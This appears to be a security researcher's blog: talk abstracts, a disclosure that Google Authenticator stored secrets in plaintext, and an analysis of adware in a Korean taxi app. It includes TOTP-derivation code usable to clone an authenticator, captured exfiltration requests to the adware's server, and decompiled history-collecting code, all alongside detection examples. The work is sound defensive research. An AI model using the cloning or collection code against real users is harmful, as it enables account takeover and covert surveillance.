[HITB GSEC] Understanding Your Opponent: Attack Profiling

This talk is based on real-world cases in Asia and Korea. We will talk about practical approaches to incident response in CERTs and also present the common points and connections between different malware incidents in Asia.

Through various incident response and malware analysis engagements, we have found that attackers used similar malware and attack methods across several incidents. Analysing the common points and relations between attacks helps us better understand the purpose and tactics of the attackers and respond more effectively. Attack profiling is a valuable method for figuring out an attacker's motives, sharing threat intelligence about incidents, and preparing response methods for expected future incidents.

We have analysed incidents targeting government agencies, media outlets, broadcasting services, critical infrastructure and the financial sector, and in this presentation we will introduce the approach and methods used for attack profiling.


1. Recent Cases

2. Attack Profiling Methods and Factors for Analysis
– Approaches for Profiling
– Tactics, Code and IOC

3. Attack Profiling in Real World Incident Cases
– Case 1 : Malware targeting the financial industry in Asia
– Case 2 : APT incident case 1
– Case 3 : APT incident case 2

4. Conclusion

We hope that through this session attendees will better understand how to analyse an attack and how to figure out its possible relations to other incidents.


Mobile Banking Integrated with Apple Touch ID

Large banks like Bank of America and Chase connected with Apple Pay. But banks in several countries did not work with Apple Pay directly; they integrated with Apple Touch ID instead: St George Bank (Australia), Tangerine (Canada), Turkiye Bankasi (Turkey).

They only added a function for authenticating by fingerprint via Touch ID, so customers can log in to mobile banking with their fingerprint instead of the traditional identification, password and PIN.

Banks can develop the fingerprint authentication using Apple's API, and the biometric data is stored on the customer's device.


Video : https://www.youtube.com/watch?v=VzLtxpSEAj4

Make a secure mobile payment – HITCON 2014

I gave a presentation at HITCON 2014 in Taiwan titled “Make a secure mobile payment”.

File : E2_06_Yongjun Park – Make a secure mobile payment


Recently, many kinds of mobile payment have launched and have taken a large share of payment transactions worldwide. As we know, a payment breach is highly dangerous because it could be exploited to steal real money directly.

I have found diverse flaws and vulnerabilities during security testing. Some of them could be used to acquire payment data and to alter transactions. I will talk about the threats to mobile payment and about vulnerability cases. I am also going to share how to test the security of mobile payment.

[Google Authenticator] Account and Key plaintexts stored in a file

[Google Authenticator] Account and Key plaintexts are stored in a file (May 22, 2012)

I found a security issue in the Google Authenticator in May 2012. I sent a paper describing the details of the issue to the Google security team, but I did not get a response from them. The authenticator was upgraded last year, but I have no idea whether or not the issue was addressed. Anyway, I am posting it before it slips out of memory.

Google provides 2-step verification to make its services more secure. A user can install and use Google's OTP (One Time Password) app on their smartphone. While analysing the authenticator on Android, I found a security issue that can be used to make a clone authenticator on another smartphone.

When a user registers their smartphone to use the authenticator, they have to enter their account and key, or scan a QR code. The authenticator then starts creating one-time passwords, and the user can authenticate to Google services with a one-time credential.


< Add account >

The authenticator offers two ways to initialise it: ‘Scan barcode’ and ‘Manually add account’. Whichever you choose, the account and key are stored in a file. The problem is that the user account and key are stored in that file as plaintext.

The stored file is a SQLite database, and the file path is


As you can see below, the email field is the user account and the secret field is the key for the authenticator. The secret looks encrypted, but that does not matter for making a clone authenticator.


< An example of stored key and secret >

If the file is copied, or the account and secret are entered into the authenticator on another smartphone, we now have a clone authenticator. The duplicated authenticators create the same one-time password at the same time, and it can be used to authenticate to Google's services.

I checked whether the authenticator verifies the device by phone number, serial or IMEI; device verification was not applied, so it does not affect the authenticator.


< The clone OTP >

Suggestions for this issue:

  1. Encrypt the account and key file
  2. Verify the device when the app executes, to check whether it is a valid device, or include a device serial in the one-time password creation process
  3. Use a more secure space such as the SIM or TrustZone to prevent malicious access (in Korea, OTP apps for banks and the financial sector are stored and executed in the SIM card)
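The following is an added example, not code from the original post or from Google. It models the issue described above: a database row holding the account (`email`) and the base32 TOTP key (`secret`) is all that is needed to derive the same one-time codes as the phone, which is why the key has to be protected at rest (suggestion 1). The table name `accounts`, the sample rows and the opaque "encrypted" value are constructed; the post only names the two column names. The TOTP routine follows RFC 6238 (HMAC-SHA1, 30-second step, 6 digits) and is checked against the RFC 4226 test key, so it also shows what a defender can expect a clone to produce.

```python
# Added example (not from the original post). Models why a plaintext base32
# TOTP secret in the authenticator's SQLite file is enough to clone the app.
import base64
import binascii
import hashlib
import hmac
import sqlite3
import struct

TIME_STEP = 30  # RFC 6238 default window, as used by Google Authenticator
DIGITS = 6      # Google Authenticator shows 6-digit codes

# RFC 4226 / RFC 6238 test key "12345678901234567890", base32-encoded.
# Constructed test data, not a real account secret.
RFC_TEST_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"


def hotp(key: bytes, counter: int, digits: int = DIGITS) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter,
    then dynamic truncation to a zero-padded decimal code."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def decode_stored_secret(secret_field: str):
    """Return the raw key if the stored value is plain base32 (the format the
    app stores), or None if it is not directly usable, e.g. an encrypted blob.
    This is the audit check: a row that decodes here can be cloned as-is."""
    candidate = secret_field.strip().upper().replace(" ", "")
    candidate += "=" * (-len(candidate) % 8)  # restore any stripped padding
    try:
        key = base64.b32decode(candidate)
    except (binascii.Error, ValueError):
        return None
    # TOTP keys are normally 10..64 bytes; anything else is not a usable key
    return key if 10 <= len(key) <= 64 else None


def totp(secret_b32: str, unix_time: int) -> str:
    """RFC 6238 TOTP for the given Unix time, from the base32 secret."""
    key = decode_stored_secret(secret_b32)
    if key is None:
        raise ValueError("secret is not a usable base32 TOTP key")
    return hotp(key, unix_time // TIME_STEP)


def build_constructed_db() -> sqlite3.Connection:
    """In-memory stand-in for the app's database. Schema and rows are
    constructed; only the 'email' and 'secret' column names come from the post."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (email TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?)",
        [
            ("alice@example.com", RFC_TEST_SECRET),  # plaintext base32: clonable
            ("bob@example.com", "ENC$v1$9f3a...!"),  # opaque blob: not usable as-is
        ],
    )
    return conn


def audit_database(conn: sqlite3.Connection, unix_time: int) -> dict:
    """Defender's check over a copy of the file: for each account, the code a
    clone would display at unix_time, or None when the stored secret is not
    directly usable. Any non-None entry means the row must be protected."""
    result = {}
    for email, secret in conn.execute("SELECT email, secret FROM accounts"):
        key = decode_stored_secret(secret)
        result[email] = hotp(key, unix_time // TIME_STEP) if key else None
    return result


if __name__ == "__main__":
    db = build_constructed_db()
    # At t=59 the RFC test key yields 287082 (counter 1 of RFC 4226 Appendix D)
    print(audit_database(db, 59))
```

Running the audit over a real copy of the file (path omitted here, as in the post) would list exactly the accounts that a second device could impersonate; after suggestion 1 is applied, every entry should come back as None because the stored value no longer decodes to a key.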

User Activities Leakage with Free App

This free Android app transfers device conditions and user activities without the user's agreement. An adware module included in the free app collects internet access data and launched-app history on the device where it is installed.

Free app: National Call Taxi – 전국 콜텍시 (Korean)
Google Play: https://play.google.com/store/apps/details?id=kr.baccharis.callTaxi

The name of each launched app and the list of accessed URLs were sent to an outside server whenever the user executed an app or browsed the web with a mobile browser while the ‘National Call Taxi’ app was running or in the background. The malicious code is NOT part of the app's main source; it was included in the app's adware module for profit.

The exfiltrated data includes the accessed URL, access time, rooting status, WiFi status and a device serial number (not a real hardware UUID; it is randomly generated).

[Sending Packet (URL Access)]

POST /servlet/Navvy.mawrite3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 208
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)
Host: ma01.mediachannel.co.kr
Connection: Keep-Alive
Accept-Encoding: gzip


[Sending Packet (App Execution)]

POST /servlet/Navvy.mawrite3 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)
Host: ma01.mediachannel.co.kr
Connection: Keep-Alive
Accept-Encoding: gzip


[Sending Information]

–  Malicious app version and name
–  Serial number (randomly generated UUID)
–  Type: app (app execution) or web (web access)
–  WiFi and rooting status
–  Executed app name or accessed URL
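The two captured requests above share a fixed host and servlet path and an Android `Dalvik/` User-Agent, which is enough for a simple network-side detection. The following is an added example (not code from the original post) that parses raw request headers of that shape and flags the beacon; the indicator host `ma01.mediachannel.co.kr` and path `/servlet/Navvy.mawrite3` come from the captures, while the sample request blocks embedded below are constructed (the second, benign one uses a hypothetical host).

```python
# Added example (not from the original post): detect the adware beacon by the
# indicators visible in the captured request headers.
from dataclasses import dataclass, field
from typing import Dict, List

BEACON_HOST = "ma01.mediachannel.co.kr"   # Host header in the captures
BEACON_PATH = "/servlet/Navvy.mawrite3"   # request path in the captures

# Constructed sample: the URL-access beacon as captured (headers only, no body)
SAMPLE_URL_ACCESS = (
    "POST /servlet/Navvy.mawrite3 HTTP/1.1\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 208\r\n"
    "User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)\r\n"
    "Host: ma01.mediachannel.co.kr\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept-Encoding: gzip\r\n"
    "\r\n"
)

# Constructed benign sample: an ordinary app update check (hypothetical host)
SAMPLE_BENIGN = (
    "GET /api/version HTTP/1.1\r\n"
    "User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.1.2; SHV-E210S Build/JZO54K)\r\n"
    "Host: updates.example.com\r\n"
    "Connection: Keep-Alive\r\n"
    "\r\n"
)


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)  # lower-cased names


def parse_request(raw: str) -> HttpRequest:
    """Parse a request line plus header lines (CRLF or LF); stops at the
    blank line that would precede a body."""
    lines = raw.replace("\r\n", "\n").split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers)


def beacon_findings(req: HttpRequest) -> List[str]:
    """Human-readable reasons a request looks like the adware beacon."""
    findings = []
    if req.headers.get("host", "").lower() == BEACON_HOST:
        findings.append("host matches adware collection server")
    if req.path == BEACON_PATH:
        findings.append("path matches adware collection servlet")
    if req.method == "POST" and req.headers.get("user-agent", "").startswith("Dalvik/"):
        findings.append("form POST from an Android app (Dalvik), not a browser")
    return findings


def is_adware_beacon(raw: str) -> bool:
    """True when the request hits the known collector host or servlet path.
    The Dalvik POST finding alone is only supporting context: many legitimate
    apps post from Dalvik, so it is not a verdict by itself."""
    findings = beacon_findings(parse_request(raw))
    return any(f.startswith(("host matches", "path matches")) for f in findings)


def scan_capture(blocks: List[str]) -> List[int]:
    """Indexes of the request blocks in a capture that match the beacon."""
    return [i for i, blk in enumerate(blocks) if is_adware_beacon(blk)]


if __name__ == "__main__":
    for hit in scan_capture([SAMPLE_URL_ACCESS, SAMPLE_BENIGN]):
        print(hit, beacon_findings(parse_request([SAMPLE_URL_ACCESS, SAMPLE_BENIGN][hit])))
```

The host and path are the reliable part of the signature; the User-Agent is kept as context only, since it identifies the Android HTTP stack rather than the adware module.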

I decompiled the malicious app and reviewed the code of the malicious functions.

[UUID Generation]

// Decompiled from the adware module. The "serial number" it sends is just a
// random UUID created on the device, not a hardware identifier. Braces were
// restored from the decompiler output; the "CreateSerial" debug string is
// built and then discarded.
private String w() {
    String str = "";
    try {
        str = UUID.randomUUID().toString();
        new StringBuilder("CreateSerial : ").append(str).toString();
    } catch (Exception localException) {
        // on failure, fall through and return the empty string
    }
    return str;
}



[Browser History Access]

// Decompiled fragment from the collection service. It re-arms an alarm so the
// collector runs again, then queries the stock browser's history for entries
// newer than the last collection time (g.i). Decompiler labels and the
// surrounding control flow were not recovered and are left as emitted.
unregisterReceiver(this.s);
stopSelf();
Intent localIntent = new Intent(this, revRankey.class);
localIntent.putExtra("appwebCollect", 4500);
PendingIntent localPendingIntent = PendingIntent.getBroadcast(this, 0, localIntent, 0);
// g.g appears to be an AlarmManager; type 2 is ELAPSED_REALTIME_WAKEUP
g.g.set(2, 10000L, localPendingIntent);
if (localObject4 == null) {
    // g.e is presumably a ContentResolver: read browser history with date > g.i
    Cursor localCursor1 = g.e.query(Browser.BOOKMARKS_URI, Browser.HISTORY_PROJECTION, "date > " + g.i, null, "date");
    localObject4 = localCursor1;
}
localObject5 = "";
if (!((Cursor)localObject4).isBeforeFirst())
    // body not recovered by the decompiler
if (localObject1 == null)
    // body not recovered by the decompiler
boolean bool1 = localObject1.contentEquals("0");
if (!bool1)
    break label509;
if (localObject4 == null)
    // fragment ends here

Some adware collects user behaviour and internet access history, and advertising companies extract value from that data for their marketing. I guess the web access and app launch data from this malicious app would be used for a similar purpose. But WiFi status and rooting condition can also be used to break into the device. I already posted the issue on Facebook, warning that other apps that include this adware could be exposed to the same security issue.

South Korea Cyberterror on March 20th – News

*** Updated on March 26th ***


South Korean Attack & Malware Analysis

South Korean Banks, Media Companies Targeted by Destructive Malware


Wowhacker Report


NProtect Report


Each report is continually being updated; the Korean reports have more detailed and accurate information. I'll keep updating.